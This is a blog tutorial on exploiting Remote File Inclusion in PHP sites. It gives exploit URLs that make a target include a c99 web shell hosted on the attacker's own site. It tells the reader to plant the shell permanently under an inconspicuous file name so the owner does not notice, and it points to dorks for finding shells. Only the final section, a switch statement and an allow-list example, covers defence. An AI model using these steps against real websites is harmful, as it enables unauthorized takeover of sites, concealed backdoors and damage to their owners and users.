What is Remote File Inclusion & How To Use?


Remote File Inclusion (RFI) is a method used to gain full access to a website. The exploit relies on the PHP include() function. Sites using this function will usually have links similar to:
index.php?file=something
index.php?page=something
If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted.
Now this is where web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands (such as SQL). The most common shell is the c99, but others are available, such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site and will be able to upload or delete any file you wish.
There are two types of PHP code vulnerable to this and each requires a slightly different method. You can't really know which type is being used, so you simply try both methods. The vulnerable PHP code will look like the following examples:
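<?php
// Type 1: the request value is passed to include() unchanged
$page = $_GET['page'];
include($page);
?>

<?php
// Type 2: ".php" is appended to the request value before include()
$page = $_GET['page'];
include($page . ".php");
?>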

How to do this

If you have found a vulnerable site, this is how to exploit it. Firstly, you need to upload your shell to your own website as a text file. For this I will use www.site.com/c99.txt. Then all you do is simply put this link at the end of your vulnerable site. I will use www.example.com. So the final strings to run the web shell are:
Example1:
www.example.com/index.php?file=http://www.site.com/c99.txt

Example2:
www.example.com/index.php?file=http://www.site.com/c99.txt?
(the question mark should be at the end)
This will execute in the PHP like so:
Example1:
include('http://www.site.com/c99.txt');

Example2:
include('http://www.site.com/c99.txt?.php');

Have access?

If you have a web shell on the site, but want to make sure you still have access if the owner changes the PHP script, you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php, then simply upload it using the shell you already have on the site (www.site.com/index.php?file=http://www.site.com/c99.txt?).
But be sure to name it something that is less obvious to the site owner than c99.php so that it looks like it is part of the site. Look around at the names of the rest of the pages.

What a shell looks like

A c99.txt shell example can be found here. If you are using a c99 shell and are successful, you will be shown a page that has:

At the top: "Safe-mode: OFF (not secure)"

Below "upload" and "make file" it says: "[ ok ]"

This means that you would have complete control over the site. A few Google dorks can easily find you a real shell though, since this is so popular at the moment.

Protect your website

Want to still use the index.php?file= but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement (like this site uses) that defines the pages beforehand. The code is shown below:
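<?php
// Use an empty string when no page parameter is sent, so the default case applies
$page = isset($_GET['page']) ? $_GET['page'] : '';
switch ($page) {
    case "page1":
        include("page1.php");
        break;
    case "page2":
        include("page2.php");
        break;
    default: // used when no page, or an unknown page, is requested
        include("home.php");
        break;
}
?>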
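
The same allow-list idea written as a lookup table, as an added example that is not this site's code: resolve_page(), url_include_enabled(), the page names and the pages/ directory are assumptions. It also reads the allow_url_include setting from php.ini, which controls whether include() will fetch a URL at all.

```php
<?php
// Added example: allow-list lookup for index.php?page=... (all names hypothetical).

// Fixed map from public page names to local files. Request data only selects
// a key; it never becomes part of the path handed to include().
const PAGES = [
    'home'  => 'home.php',
    'page1' => 'page1.php',
    'page2' => 'page2.php',
];

// Return the local file for the requested page, or home.php when the value is
// missing, not a string, or not a known key.
function resolve_page($requested): string
{
    // ?page[]=x arrives as an array; anything but a string is treated as unknown.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$requested];
}

// Defence in depth: with allow_url_include off (the PHP default), include()
// refuses http:// and ftp:// targets even if a vulnerable script is deployed.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed sample inputs, including the two request shapes shown on this page.
$samples = [
    'page1',
    'http://www.site.com/c99.txt',
    'http://www.site.com/c99.txt?',
    '../page1',
    ['page1'],
    null,
];

foreach ($samples as $value) {
    printf("%-34s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), resolve_page($value));
}
printf("allow_url_include enabled: %s\n", url_include_enabled() ? 'yes' : 'no');

// In index.php (the pages/ directory is an assumption):
// include __DIR__ . '/pages/' . resolve_page($_GET['page'] ?? null);
```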

Dhirendra Biswal

Hi. I'm Dhirendra, the admin of this blog. I'm a Certified Ethical Hacker and also a web developer with programming skills in various programming languages.
